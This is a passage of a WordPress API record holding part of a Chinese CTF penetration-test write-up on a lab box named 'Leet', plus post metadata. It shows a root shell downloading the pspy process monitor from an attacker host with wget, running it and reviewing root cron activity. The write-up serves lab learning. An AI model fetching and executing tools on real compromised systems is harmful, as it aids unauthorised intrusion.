class=\"language-bash\">root@leet:\/tmp# wget http:\/\/192.168.0.143:8888\/lpspy64\n--2024-07-01 13:07:30--  http:\/\/192.168.0.143:8888\/lpspy64\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 3104768 (3.0M) [application\/octet-stream]\nSaving to: \u2018lpspy64\u2019\n\nlpspy64                              100%[=====================================================================&gt;]   2.96M  --.-KB\/s    in 0.05s   \n\n2024-07-01 13:07:30 (63.8 MB\/s) - \u2018lpspy64\u2019 saved [3104768\/3104768]\n\nroot@leet:\/tmp# chmod +x *\nroot@leet:\/tmp# .\/lpspy64\npspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d\n\n     \u2588\u2588\u2593\u2588\u2588\u2588    \u2588\u2588\u2588\u2588\u2588\u2588  \u2588\u2588\u2593\u2588\u2588\u2588 \u2593\u2588\u2588   \u2588\u2588\u2593\n    \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588    \u2592 \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588  \u2588\u2588\u2592\n    \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2591 \u2593\u2588\u2588\u2584   \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592 \u2592\u2588\u2588 \u2588\u2588\u2591\n    \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592  \u2592   \u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592 \u2591 \u2590\u2588\u2588\u2593\u2591\n    \u2592\u2588\u2588\u2592 \u2591  \u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592 \u2591  \u2591 \u2591 \u2588\u2588\u2592\u2593\u2591\n    \u2592\u2593\u2592\u2591 \u2591  \u2591\u2592 \u2592\u2593\u2592 \u2592 \u2591\u2592\u2593\u2592\u2591 \u2591  \u2591  \u2588\u2588\u2592\u2592\u2592 \n    \u2591\u2592 \u2591     \u2591 \u2591\u2592  \u2591 \u2591\u2591\u2592 \u2591     \u2593\u2588\u2588 \u2591\u2592\u2591 \n    \u2591\u2591       \u2591  \u2591  \u2591  \u2591\u2591       \u2592 \u2592 \u2591\u2591  \n                   \u2591           \u2591 \u2591     \n                               \u2591 \u2591     \n2024\/07\/01 13:07:42 CMD: UID=0     PID=3      | \n2024\/07\/01 13:07:42 CMD: UID=0     PID=2      | \n2024\/07\/01 13:07:42 CMD: UID=0     PID=1      | \/sbin\/init \n2024\/07\/01 13:08:01 CMD: UID=0     PID=12598  | \n2024\/07\/01 13:08:31 CMD: UID=0     PID=12599  | \n2024\/07\/01 13:09:01 CMD: UID=0     PID=12602  | \/usr\/sbin\/CRON -f \n2024\/07\/01 13:09:01 CMD: UID=0     PID=12601  | \/usr\/sbin\/CRON -f <\/code><\/pre>\n<p>\u65e0\u5f02\u5e38\uff0c\u90a3\u53ef\u80fd\u5c31\u662f\u6709\u4e9b\u9650\u5236\u8bbf\u95ee\uff1f\u6682\u4e14\u8fd9\u6837\u5427\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Leet \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet] \u2514\u2500$ rustsca [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-711","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/711","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=711"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/711\/revisions"}],"predecessor-version":[{"id":743,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/711\/revisions\/743"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=711"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=711"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=711"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}